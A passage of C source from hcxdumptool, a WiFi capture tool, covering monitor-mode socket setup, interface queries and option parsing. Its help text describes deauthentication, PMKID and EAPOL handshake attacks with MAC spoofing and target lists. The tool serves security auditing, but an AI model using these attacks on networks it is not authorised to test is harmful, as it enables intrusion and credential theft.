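	fd_pcapng = hcxcreatepcapngdump(pcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta);
	if(fd_pcapng <= 0)
		{
		fprintf(stderr, "could not create dumpfile %s\n", pcapngoutname);
		return false;
		}
	}
if(weppcapngoutname != NULL)
	{
	fd_weppcapng = hcxcreatepcapngdump(weppcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta);
	if(fd_weppcapng <= 0)
		{
		fprintf(stderr, "could not create dumpfile %s\n", weppcapngoutname);
		return false;
		}
	}
if(ippcapngoutname != NULL)
	{
	fd_ippcapng = hcxcreatepcapngdump(ippcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta);
	if(fd_ippcapng <= 0)
		{
		fprintf(stderr, "could not create dumpfile %s\n", ippcapngoutname);
		return false;
		}
	}
wantstopflag = false;
signal(SIGINT, programmende);
if((gpiobutton > 0) || (gpiostatusled > 0))
	{
	if(gpiobutton == gpiostatusled)
		{
		fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n");
		return false;
		}
	gpiobasemem = getrpirev();
	if(gpiobasemem == 0)
		{
		fprintf(stderr, "failed to locate GPIO\n");
		return false;
		}
	if(initgpio(gpiobasemem) == false)
		{
		fprintf(stderr, "failed to init GPIO\n");
		return false;
		}
	if(gpiostatusled > 0)
		{
		INP_GPIO(gpiostatusled);
		OUT_GPIO(gpiostatusled);
		}
	if(gpiobutton > 0)
		{
		INP_GPIO(gpiobutton);
		}
	}
if(gpiostatusled > 0)
	{
	/* visible "ready" signal: five blinks */
	for (c = 0; c < 5; c++)
		{
		GPIO_SET = 1 << gpiostatusled;
		usleep(GPIO_DELAY);
		GPIO_CLR = 1 << gpiostatusled;
		usleep(GPIO_DELAY +GPIO_DELAY);
		}
	}
return true;
}
/*===========================================================================*/
/* zero an ifreq and address it to the global interfacename */
static void ifreq_for_interface(struct ifreq *ifr)
{
memset(ifr, 0, sizeof(*ifr));
strncpy(ifr->ifr_name, interfacename, IFNAMSIZ -1);
}
/*---------------------------------------------------------------------------*/
/* zero an iwreq and address it to the global interfacename */
static void iwreq_for_interface(struct iwreq *iwr)
{
memset(iwr, 0, sizeof(*iwr));
strncpy(iwr->ifr_name, interfacename, IFNAMSIZ -1);
}
/*===========================================================================*/
/*
 * Open the raw AF_PACKET socket on interfacename and switch the interface
 * to monitor mode: save the current flags and wireless mode into the globals
 * ifr_old / iwr_old (presumably restored by globalclose() -- confirm), bring
 * the interface down, set IW_MODE_MONITOR, bring it up, check that it is
 * UP|RUNNING|BROADCAST, bind fd_socket to the interface and read the
 * permanent hardware address into mac_orig.  Finally the TCP socket for
 * gpsd (fd_socket_gpsd) is created; if that fails gpsd use is disabled.
 *
 * With ignorewarningflag set, failures of the mode/flag steps are reported
 * but not fatal.  Returns false on a fatal error (socket creation, reading
 * the initial flags, SIOCGIFINDEX, bind, permanent address); fd_socket is
 * left open in that case.
 */
static inline bool opensocket()
{
static struct ifreq ifr;
static struct iwreq iwr;
static struct sockaddr_ll ll;
static struct ethtool_perm_addr *epmaddr;

fd_socket = 0;
fd_socket_gpsd = 0;
checkallunwanted();
if(checkmonitorinterface(interfacename) == true)
	{
	fprintf(stderr, "warning: %s is probably a monitor interface\n", interfacename);
	}
if((fd_socket = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
	{
	perror("socket failed (do you have root privileges?)");
	return false;
	}
/* remember the interface state before changing it */
ifreq_for_interface(&ifr_old);
if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr_old) < 0)
	{
	perror("failed to get current interface flags");
	return false;
	}
iwreq_for_interface(&iwr_old);
if(ioctl(fd_socket, SIOCGIWMODE, &iwr_old) < 0)
	{
	perror("failed to save current interface mode");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
/* ifr_flags == 0: clears IFF_UP (and every other settable flag) */
ifreq_for_interface(&ifr);
if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0)
	{
	perror("failed to set interface down");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
iwreq_for_interface(&iwr);
iwr.u.mode = IW_MODE_MONITOR;
if(ioctl(fd_socket, SIOCSIWMODE, &iwr) < 0)
	{
	perror("failed to set monitor mode");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
iwreq_for_interface(&iwr);
if(ioctl(fd_socket, SIOCGIWMODE, &iwr) < 0)
	{
	perror("failed to get interface information");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
/* u.mode holds one IW_MODE_* enumerator, not a bitmask, so it has to be
 * compared for equality -- a mask test would also accept another mode whose
 * value happens to contain the IW_MODE_MONITOR bits */
if(iwr.u.mode != IW_MODE_MONITOR)
	{
	fprintf(stderr, "interface is not in monitor mode\n");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
ifreq_for_interface(&ifr);
ifr.ifr_flags = IFF_UP;
if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0)
	{
	perror("failed to set interface up");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
ifreq_for_interface(&ifr);
if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0)
	{
	perror("failed to get interface flags");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
if((ifr.ifr_flags & (IFF_UP | IFF_RUNNING | IFF_BROADCAST)) != (IFF_UP | IFF_RUNNING | IFF_BROADCAST))
	{
	fprintf(stderr, "interface may not be operational\n");
	if(ignorewarningflag == false)
		{
		return false;
		}
	}
ifreq_for_interface(&ifr);
if(ioctl(fd_socket, SIOCGIFINDEX, &ifr) < 0)
	{
	perror("failed to get SIOCGIFINDEX");
	return false;
	}
memset(&ll, 0, sizeof(ll));
ll.sll_family = AF_PACKET;
ll.sll_ifindex = ifr.ifr_ifindex;
ll.sll_protocol = htons(ETH_P_ALL);
ll.sll_halen = ETH_ALEN;
if(bind(fd_socket, (struct sockaddr*) &ll, sizeof(ll)) < 0)
	{
	perror("failed to bind socket");
	return false;
	}
/* ethtool_perm_addr is followed by the address bytes themselves */
epmaddr = malloc(sizeof(struct ethtool_perm_addr) +6);
if(epmaddr == NULL)
	{
	perror("failed to malloc memory for permanent hardware address");
	return false;
	}
ifreq_for_interface(&ifr);
epmaddr->cmd = ETHTOOL_GPERMADDR;
epmaddr->size = 6;
ifr.ifr_data = (char*)epmaddr;
if(ioctl(fd_socket, SIOCETHTOOL, &ifr) < 0)
	{
	perror("failed to get permanent hardware address");
	free(epmaddr);
	return false;
	}
if(epmaddr->size != 6)
	{
	fprintf(stderr, "failed to get permanent hardware address length\n");
	free(epmaddr);
	return false;
	}
memcpy(&mac_orig, epmaddr->data, 6);
free(epmaddr);
/* gpsd is optional: a failed socket only turns the feature off */
if((fd_socket_gpsd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
	{
	perror( "gpsd socket failed");
	gpsdflag = false;
	}
return true;
}
/*===========================================================================*/
static bool testinterface()
{
static struct ifaddrs *ifaddr = NULL;
static struct ifaddrs *ifa = NULL;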
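if(getifaddrs(&ifaddr) == -1)
	{
	perror("failed to get ifaddrs");
	return false;
	}
/* true when an AF_PACKET entry exists for interfacename; the list is
 * released on every path instead of being leaked */
for(ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next)
	{
	if(ifa->ifa_addr == NULL)
		{
		continue;
		}
	if(strncmp(ifa->ifa_name, interfacename, IFNAMSIZ) != 0)
		{
		continue;
		}
	if(ifa->ifa_addr->sa_family == AF_PACKET)
		{
		freeifaddrs(ifaddr);
		return true;
		}
	}
freeifaddrs(ifaddr);
return false;
}
/*===========================================================================*/
/*
 * Query a network interface by name: confirm it is a wireless device
 * (SIOCGIWNAME), copy its permanent hardware address (ETHTOOL_GPERMADDR)
 * into permaddr[6] and its driver short name (ETHTOOL_GDRVINFO) into
 * drivername.  drivername must have room for 32 bytes and is always
 * NUL-terminated on success.  A throw-away AF_INET socket is used for the
 * ioctls and closed on every path.  Returns false on any failure
 * (not wireless, allocation or ioctl error, address length != 6); the
 * output buffers may then be partially written.
 */
static bool get_perm_addr(char *ifname, uint8_t *permaddr, char *drivername)
{
static int fd_info;
static struct iwreq iwr;
static struct ifreq ifr;
static struct ethtool_perm_addr *epmaddr;
static struct ethtool_drvinfo drvinfo;

if((fd_info = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
	perror( "socket info failed" );
	return false;
	}
memset(&iwr, 0, sizeof(iwr));
strncpy(iwr.ifr_name, ifname, IFNAMSIZ -1);
if(ioctl(fd_info, SIOCGIWNAME, &iwr) < 0)
	{
	#ifdef DEBUG
	printf("testing %s %s\n", ifname, drivername);
	perror("not a wireless interface");
	#endif
	close(fd_info);
	return false;
	}
/* ethtool_perm_addr is followed by the address bytes themselves */
epmaddr = malloc(sizeof(struct ethtool_perm_addr) +6);
if(epmaddr == NULL)
	{
	perror("failed to malloc memory for permanent hardware address");
	close(fd_info);
	return false;
	}
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1);
epmaddr->cmd = ETHTOOL_GPERMADDR;
epmaddr->size = 6;
ifr.ifr_data = (char*)epmaddr;
if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0)
	{
	perror("failed to get permanent hardware address");
	free(epmaddr);
	close(fd_info);
	return false;
	}
if(epmaddr->size != 6)
	{
	free(epmaddr);
	close(fd_info);
	return false;
	}
memcpy(permaddr, epmaddr->data, 6);
/* the address is copied out, so the buffer can go before the second ioctl
 * and the remaining error path has one less thing to release */
free(epmaddr);
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1);
memset(&drvinfo, 0, sizeof(drvinfo));
drvinfo.cmd = ETHTOOL_GDRVINFO;
ifr.ifr_data = (char*)&drvinfo;
if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0)
	{
	perror("failed to get driver information");
	close(fd_info);
	return false;
	}
/* drvinfo.driver is a 32 byte field; force termination so a full-length
 * name cannot make the caller's "%s" read past the buffer */
memcpy(drivername, drvinfo.driver, 32);
drivername[31] = 0;
close(fd_info);
return true;
}
/*===========================================================================*/
static void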
show_wlaninterfaces() { static int p; static struct ifaddrs *ifaddr = NULL; static struct ifaddrs *ifa = NULL; static uint8_t permaddr[6]; static char drivername[32]; if(getifaddrs(&ifaddr) == -1) { perror("failed to get ifaddrs"); } else { printf("wlan interfaces:\n"); for(ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) { if((ifa->ifa_addr) && (ifa->ifa_addr->sa_family == AF_PACKET)) { memset(&drivername, 0, 32); if(get_perm_addr(ifa->ifa_name, permaddr, drivername) == true) { for (p = 0; p < 6; p++) { printf("%02x", (permaddr[p])); } if(checkmonitorinterface(ifa->ifa_name) == false) { printf(" %s (%s)\n", ifa->ifa_name, drivername); } else { printf(" %s (%s) warning: probably a monitor interface!\n", ifa->ifa_name, drivername); } } } } freeifaddrs(ifaddr); } return; } /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { printf("%s %s (C) %s ZeroBeat\n", eigenname, VERSION, VERSION_JAHR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { printf("%s %s (C) %s ZeroBeat\n" "usage : %s \n" " press the switch to terminate hcxdumptool\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" "example: %s -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status=3\n" " do not run hcxdumptool on logical interfaces (monx, wlanxmon)\n" " do not use hcxdumptool in combination with other 3rd party tools, which take access to the interface\n" "\n" "options:\n" "-i : interface (monitor mode will be enabled by hcxdumptool)\n" " can also be done manually:\n" " ip link set down\n" " iw dev set type monitor\n" " ip link set up\n" "-o : output file in pcapng format\n" " management frames and EAP/EAPOL frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-O : output file in pcapng format\n" " 
unencrypted IPv4 and IPv6 frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-W : output file in pcapng format\n" " encrypted WEP frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-c : set scan list (1,2,3,...)\n" " default scan list: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12, 13\n" " maximum entries: 127\n" " allowed channels (depends on the device):\n" " 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14\n" " 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96\n" " 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128\n" " 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159\n" " 161, 165, 169, 173\n" "-t : stay time on channel before hopping to the next channel\n" " default: %d seconds\n" "-T : set maximum ERROR count (hcxdumptool terminates when the value is reached)\n" " errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx)\n" " default: %d errors\n" "-E : EAPOL timeout\n" " default: %d = 1 second\n" " value depends on channel assignment\n" "-D : deauthentication interval\n" " default: %d (every %d beacons)\n" " the target beacon interval is used as trigger\n" "-A : ap attack interval\n" " default: %d (every %d beacons)\n" " the target beacon interval is used as trigger\n" "-I : show wlan interfaces and quit\n" "-C : show available channels and quit\n" " if no channels are available, interface is pobably in use or doesn't support monitor mode\n" "-h : show this help\n" "-v : show version\n" "\n" "--filterlist= : mac filter list\n" " format: 112233445566 + comment\n" " maximum line length %d, maximum entries %d\n" " run first --do_rcascan to retrieve information about the target\n" "--filtermode= : mode for filter list\n" " 1: use filter list as protection list (default) in transmission branch\n" " receive everything, interact with all APs and CLIENTs in range,\n" " except(!) 
the ones from the filter list\n" " 2: use filter list as target list in transmission branch\n" " receive everything, only interact with APs and CLIENTs in range,\n" " from the filter list\n" " 3: use filter list as target list in receiving branch\n" " only receive APs and CLIENTs in range,\n" " from the filter list\n" "--silent : do not transmit!\n" " hcxdumptool is acting like a passive dumper\n" "--disable_active_scan : do not transmit proberequests to BROADCAST using a BROADCAST ESSID\n" " do not transmit BROADCAST beacons\n" " affected: ap-less and client-less attacks\n" "--disable_deauthentications : disable transmitting deauthentications\n" " affected: connections between client an access point\n" " deauthentication attacks will not work against protected management frames\n" "--give_up_deauthentications=: disable transmitting deauthentications after n tries\n" " default: %d tries (minimum: 4)\n" " affected: connections between client an access point\n" " deauthentication attacks will not work against protected management frames\n" "--disable_disassociations : disable transmitting disassociations\n" " affected: retry (EAPOL 4/4 - M4) attack\n" "--disable_ap_attacks : disable attacks on single access points\n" " affected: client-less (PMKID) attack\n" "--give_up_ap_attacks= : disable transmitting directed proberequests after n tries\n" " default: %d tries (minimum: 4)\n" " affected: client-less attack\n" " deauthentication attacks will not work against protected management frames\n" "--disable_client_attacks : disable attacks on single clients\n" " affected: ap-less (EAPOL 2/4 - M2) attack\n" "--do_rcascan : show radio channel assignment (scan for target access points)\n" " this can be used to test if packet injection is working\n" " if no access point responds, packet injection is probably not working\n" " you should disable auto scrolling in your terminal settings\n" " use this collected data for the target list\n" "--ap_mac= : use this MAC address for 
access point as start MAC\n" " format = 112233445566\n" " format = 112233000000 (to set only OUI)\n" " format = 445566 (to set only NIC)\n" " last octed is set to unicast and global unique (OUI forced)\n" " warning: do not use a MAC of an existing access point in your range\n" "--station_mac= : use this MAC address for station\n" " format = 112233445566\n" " format = 112233000000 (to set only OUI)\n" " format = 445566 (to set only NIC)\n" "--station_vendor= : use this VENDOR information for station\n" " 0: transmit no VENDOR information (default)\n" " 1: Broadcom\n" " 2: Apple-Broadcom\n" " 3: Sonos\n" " 4: Netgear-Broadcom\n" " 5: Wilibox Deliberant Group LLC\n" " 6: Cisco Systems, Inc\n" "--use_gpsd : use GPSD to retrieve position\n" " add latitude, longitude and altitude to every pcapng frame\n" " retrieve GPS information with hcxpcaptool (-g) or tshark:\n" " tshark -r capturefile.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment\n" "--save_rcascan= : output rca scan list to file when hcxdumptool terminated\n" "--save_rcascan_raw= : output file in pcapng format\n" " unfiltered packets\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "--enable_status= : enable status messages\n" " bitmask:\n" " 1: EAPOL\n" " 2: PROBEREQUEST/PROBERESPONSE\n" " 4: AUTHENTICATON\n" " 8: ASSOCIATION\n" " 16: BEACON\n" " example: 3 = show EAPOL and PROBEREQUEST/PROBERESPONSE\n" "--poweroff : once hcxdumptool terminated, power off system\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default = GPIO not in use\n" "--ignore_warning : ignore warnings\n" " try this if you get some driver warnings\n" " do not report issues\n" "--help : show this help\n" "--version : show version\n" "\n" "If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!\n" 
/* (tail of a help-text printer, most likely usage(): its printf() call and
 * function header begin earlier in the file; the format arguments below are
 * the build-time defaults reported in the help output)
 * NOTE(review): "cmpress" in the help text is a typo for "compress"; it is a
 * runtime string and therefore left untouched here. */
"It is not a good idea to merge a lot of small cap/pcap/pcapng files to a big one!\n"
"It is much better to run gzip to cmpress the files. Wireshark, tshark and hcxpcaptool will understand this.\n"
"\n", eigenname, VERSION, VERSION_JAHR, eigenname, eigenname, TIME_INTERVAL, ERRORMAX, EAPOLTIMEOUT, DEAUTHENTICATIONINTERVALL, DEAUTHENTICATIONINTERVALL, APATTACKSINTERVALL, APATTACKSINTERVALL, FILTERLIST_LINE_LEN, FILTERLIST_MAX, DEAUTHENTICATIONS_MAX, APPATTACKS_MAX);
exit(EXIT_SUCCESS);
}
/*---------------------------------------------------------------------------*/
/*
 * Print the "run -h for help" hint for a rejected command line and terminate
 * with EXIT_FAILURE. eigenname is the program name shown in the banner
 * (main() passes basename(argv[0])). The hint goes to stdout, not stderr.
 */
__attribute__ ((noreturn)) static inline void usageerror(char *eigenname)
{
printf("%s %s (C) %s by ZeroBeat\n"
	"usage: %s -h for help\n", eigenname, VERSION, VERSION_JAHR, eigenname);
exit(EXIT_FAILURE);
}
/*===========================================================================*/
/*
 * Entry point of hcxdumptool.
 *
 * 1. resets the file-scope configuration variables to the build-time
 *    defaults from include/hcxdumptool.h,
 * 2. parses the command line with getopt_long() (most numeric options are
 *    range-checked and exit(EXIT_FAILURE) on a bad value),
 * 3. validates the run-time environment: an interface was named, the
 *    process runs as root, testinterface() accepts the adapter,
 * 4. opens the capture socket (opensocket()) and the globals (globalinit()),
 *    restoring the saved interface settings on failure,
 * 5. hands control to processpackets(), or to processrcascan() when one of
 *    the rcascan options was given.
 *
 * Returns EXIT_SUCCESS after the listing path (-I) and after a normal run;
 * validation failures exit(EXIT_FAILURE) directly.
 */
int main(int argc, char *argv[])
{
/* locals are declared static throughout this code base (file convention) */
static int auswahl;
static int index;
static bool showinterfaces = false;
static bool showchannels = false;
static unsigned long long int apmac;
static unsigned long long int stationmac;
static struct ifreq ifr;

/* build-time defaults (include/hcxdumptool.h); the options below may override them */
maxerrorcount = ERRORMAX;
staytime = TIME_INTERVAL;
eapoltimeout = EAPOLTIMEOUT;
deauthenticationintervall = DEAUTHENTICATIONINTERVALL;
deauthenticationsmax = DEAUTHENTICATIONS_MAX;
apattacksintervall = APATTACKSINTERVALL;
apattacksmax = APPATTACKS_MAX;
filtermode = 0;
statusout = 0;
stachipset = 0;
ignorewarningflag = false;
poweroffflag = false;
gpsdflag = false;
staytimeflag = false;
/* the five flags below are set by the --disable_* options (all at once by
 * --silent); true means the corresponding behaviour is switched off */
activescanflag = false;
rcascanflag = false;
deauthenticationflag = false;
disassociationflag = false;
attackapflag = false;
attackclientflag = false;
myouiap = 0;
mynicap = 0;
myouista = 0;
mynicsta = 0;
interfacename = NULL;
pcapngoutname = NULL;
ippcapngoutname = NULL;
weppcapngoutname = NULL;
filterlistname = NULL;
rcascanpcapngname = NULL;
static const char *short_options = "i:o:O:W:c:t:T:E:D:A:IChv";
/* the HCXD_* values are the long-option ids from include/hcxdumptool.h */
static const struct option long_options[] =
{
	{"filterlist", required_argument, NULL, HCXD_FILTERLIST},
	{"filtermode", required_argument, NULL, HCXD_FILTERMODE},
	{"silent", no_argument, NULL, HCXD_SILENT},
	{"disable_active_scan", no_argument, NULL, HCXD_DISABLE_ACTIVE_SCAN},
	{"disable_deauthentications", no_argument, NULL, HCXD_DISABLE_DEAUTHENTICATIONS},
	{"give_up_deauthentications", required_argument, NULL, HCXD_GIVE_UP_DEAUTHENTICATIONS},
	{"disable_disassociations", no_argument, NULL, HCXD_DISABLE_DISASSOCIATIONS},
	{"disable_ap_attacks", no_argument, NULL, HCXD_DISABLE_AP_ATTACKS},
	{"give_up_ap_attacks", required_argument, NULL, HCXD_GIVE_UP_AP_ATTACKS},
	{"disable_client_attacks", no_argument, NULL, HCXD_DISABLE_CLIENT_ATTACKS},
	{"use_gpsd", no_argument, NULL, HCXD_USE_GPSD},
	{"ap_mac", required_argument, NULL, HCXD_AP_MAC},
	{"station_mac", required_argument, NULL, HCXD_STATION_MAC},
	{"station_vendor", required_argument, NULL, HCXD_STATION_VENDOR},
	{"do_rcascan", no_argument, NULL, HCXD_DO_RCASCAN},
	{"save_rcascan", required_argument, NULL, HCXD_SAVE_RCASCAN},
	{"save_rcascan_raw", required_argument, NULL, HCXD_SAVE_RCASCAN_RAW},
	{"enable_status", required_argument, NULL, HCXD_ENABLE_STATUS},
	{"ignore_warning", no_argument, NULL, HCXD_IGNORE_WARNING},
	{"poweroff", no_argument, NULL, HCXD_POWER_OFF},
	{"gpio_button", required_argument, NULL, HCXD_GPIO_BUTTON},
	{"gpio_statusled", required_argument, NULL, HCXD_GPIO_STATUSLED},
	{"version", no_argument, NULL, HCXD_VERSION},
	{"help", no_argument, NULL, HCXD_HELP},
	{NULL, 0, NULL, 0}
};

auswahl = -1;
index = 0;
optind = 1;
optopt = 0;
gpiostatusled = 0;
gpiobutton = 0;
while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1)
	{
	switch (auswahl)
		{
		case HCXD_FILTERLIST:
		/* a filter list implies filtermode 1 unless --filtermode came first */
		filterlistname = optarg;
		if(filtermode == 0)
			{
			filtermode = 1;
			}
		break;

		case HCXD_FILTERMODE:
		/* numeric options use strtol() without an end pointer: a non-numeric
		 * argument yields 0 and is rejected only where a range check exists */
		filtermode = strtol(optarg, NULL, 10);
		if((filtermode < 1) || (filtermode > 3))
			{
			fprintf(stderr, "wrong filtermode\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_SILENT:
		/* --silent = every --disable_* option at once */
		activescanflag = true;
		deauthenticationflag = true;
		disassociationflag = true;
		attackapflag = true;
		attackclientflag = true;
		break;

		case HCXD_DISABLE_ACTIVE_SCAN:
		activescanflag = true;
		break;

		case HCXD_DISABLE_DEAUTHENTICATIONS:
		deauthenticationflag = true;
		break;

		case HCXD_GIVE_UP_DEAUTHENTICATIONS:
		/* lower bound 4, no upper bound (default DEAUTHENTICATIONS_MAX) */
		deauthenticationsmax = strtol(optarg, NULL, 10);
		if(deauthenticationsmax < 4)
			{
			fprintf(stderr, "wrong deauthentication give up value\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_DISABLE_DISASSOCIATIONS:
		disassociationflag = true;
		break;

		case HCXD_DISABLE_AP_ATTACKS:
		attackapflag = true;
		break;

		case HCXD_GIVE_UP_AP_ATTACKS:
		/* lower bound 4, no upper bound (default APPATTACKS_MAX) */
		apattacksmax = strtol(optarg, NULL, 10);
		if(apattacksmax < 4)
			{
			fprintf(stderr, "wrong ap-attack give up value\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_DISABLE_CLIENT_ATTACKS:
		attackclientflag = true;
		break;

		case HCXD_AP_MAC:
		/* hex MAC split into OUI (upper 24 bits) and NIC part (lower 24 bits).
		 * NOTE(review): the OUI mask is 0xfc.. here but 0xff.. for --station_mac
		 * below, so the two low bits of the first octet (the I/G and U/L bits)
		 * are dropped for access points - presumably deliberate; confirm */
		apmac = strtoll(optarg, NULL, 16);
		myouiap = (apmac &0xfcffff000000) >>24;
		mynicap = apmac & 0xffffff;
		break;

		case HCXD_STATION_MAC:
		stationmac = strtoll(optarg, NULL, 16);
		myouista = (stationmac &0xffffff000000) >>24;
		mynicsta = stationmac & 0xffffff;
		break;

		case HCXD_STATION_VENDOR:
		/* CS_* codes from include/hcxdumptool.h; only the upper bound is
		 * checked, so a negative value is accepted */
		stachipset = strtol(optarg, NULL, 10);
		if(stachipset >= CS_ENDE)
			{
			fprintf(stderr, "wrong station VENDOR information\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_USE_GPSD:
		gpsdflag = true;
		break;

		case HCXD_DO_RCASCAN:
		rcascanflag = true;
		break;

		case HCXD_SAVE_RCASCAN:
		/* both save options imply --do_rcascan */
		rcascanflag = true;
		rcascanlistname = optarg;
		break;

		case HCXD_SAVE_RCASCAN_RAW:
		rcascanflag = true;
		rcascanpcapngname = optarg;
		break;

		case HCXD_ENABLE_STATUS:
		/* bit mask of STATUS_* values; repeated options accumulate, no validation */
		statusout |= strtol(optarg, NULL, 10);
		break;

		case HCXD_GPIO_BUTTON:
		/* BCM GPIO numbers, the same 2...27 range as in hcxpioff */
		gpiobutton = strtoll(optarg, NULL, 10);
		if((gpiobutton < 2) || (gpiobutton > 27))
			{
			fprintf(stderr, "only 2...27 allowed\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_GPIO_STATUSLED:
		gpiostatusled = strtoll(optarg, NULL, 10);
		if((gpiostatusled < 2) || (gpiostatusled > 27))
			{
			fprintf(stderr, "only 2...27 allowed\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCXD_IGNORE_WARNING:
		ignorewarningflag = true;
		break;

		case HCXD_POWER_OFF:
		poweroffflag = true;
		break;

		case HCXD_HELP:
		/* usage() and version() do not return */
		usage(basename(argv[0]));
		break;

		case HCXD_VERSION:
		version(basename(argv[0]));
		break;

		case 'i':
		/* getopt_long() supplies a non-NULL optarg for an option declared with
		 * a required argument ("i:"), so the NULL check below cannot fire; the
		 * effective "no interface" check is the one after the loop */
		interfacename = optarg;
		if(interfacename == NULL)
			{
			fprintf(stderr, "no interface specified\n");
			exit(EXIT_FAILURE);
			}
		break;

		case 'o':
		pcapngoutname = optarg;
		break;

		case 'O':
		ippcapngoutname = optarg;
		break;

		case 'W':
		weppcapngoutname = optarg;
		break;

		case 'c':
		/* the channel list is parsed and validated by processuserscanlist() */
		if(processuserscanlist(optarg) == false)
			{
			fprintf(stderr, "unknown channel selected\n");
			exit (EXIT_FAILURE);
			}
		break;

		case 't':
		/* unlike the other numeric options an invalid value is replaced by
		 * the default with a warning instead of terminating */
		staytime = strtol(optarg, NULL, 10);
		if(staytime < 1)
			{
			fprintf(stderr, "wrong hoptime\nsetting hoptime to %d\n", TIME_INTERVAL);
			staytime = TIME_INTERVAL;
			}
		staytimeflag = true;
		break;

		case 'E':
		eapoltimeout = strtol(optarg, NULL, 10);
		if(eapoltimeout < 10)
			{
			fprintf(stderr, "EAPOL timeout is to low\n");
			exit (EXIT_FAILURE);
			}
		break;

		case 'D':
		deauthenticationintervall = strtol(optarg, NULL, 10);
		if(deauthenticationintervall < 1)
			{
			fprintf(stderr, "wrong deauthentication intervall\n");
			exit (EXIT_FAILURE);
			}
		break;

		case 'A':
		apattacksintervall = strtol(optarg, NULL, 10);
		if(apattacksintervall < 1)
			{
			fprintf(stderr, "wrong access point attack intervall\n");
			exit (EXIT_FAILURE);
			}
		break;

		case 'T':
		/* no range check: 0 or a negative error limit is stored as given;
		 * what that means is decided where maxerrorcount is consumed */
		maxerrorcount = strtol(optarg, NULL, 10);
		break;

		case 'I':
		showinterfaces = true;
		break;

		case 'C':
		showchannels = true;
		break;

		case '?':
		/* unknown option or missing argument; usageerror() does not return */
		usageerror(basename(argv[0]));
		break;
		}
	}

if(argc < 2)
	{
	/* no arguments at all: message on stderr, but the exit status is still success */
	fprintf(stderr, "no option selected\n");
	return EXIT_SUCCESS;
	}

/* a filter mode without a filter list is meaningless; silently reset */
if(filterlistname == NULL)
	{
	filtermode = 0;
	}

/* -I lists the wlan interfaces and returns before any interface is touched */
if(showinterfaces == true)
	{
	show_wlaninterfaces();
	checkallunwanted();
	return EXIT_SUCCESS;
	}

if(interfacename == NULL)
	{
	fprintf(stderr, "no interface selected\n");
	exit(EXIT_FAILURE);
	}

/* privilege check on the real uid only (not on capabilities) */
if(getuid() != 0)
	{
	fprintf(stderr, "this program requires root privileges\n");
	exit(EXIT_FAILURE);
	}

if(testinterface() == false)
	{
	fprintf(stderr, "interface is not suitable\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n");
	exit(EXIT_FAILURE);
	}

if(ignorewarningflag == true)
	{
	printf("warnings are ignored - interface may not work as expected - do not report issues!\n");
	}

printf("initialization...\n");
if(opensocket() == false)
	{
	fprintf(stderr, "failed to init socket\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n");
	/* best-effort restore of the adapter: a zeroed ifreq (flags cleared) is
	 * applied first, then the saved wireless mode and interface flags
	 * (iwr_old/ifr_old are presumably captured by testinterface() or
	 * opensocket()); the ioctl() results are not checked. The memset()
	 * keeps ifr_name NUL terminated after the strncpy(). The identical
	 * sequence is repeated after globalinit() below - a candidate for a
	 * small helper. */
	if(fd_socket > 0)
		{
		memset(&ifr, 0, sizeof(ifr));
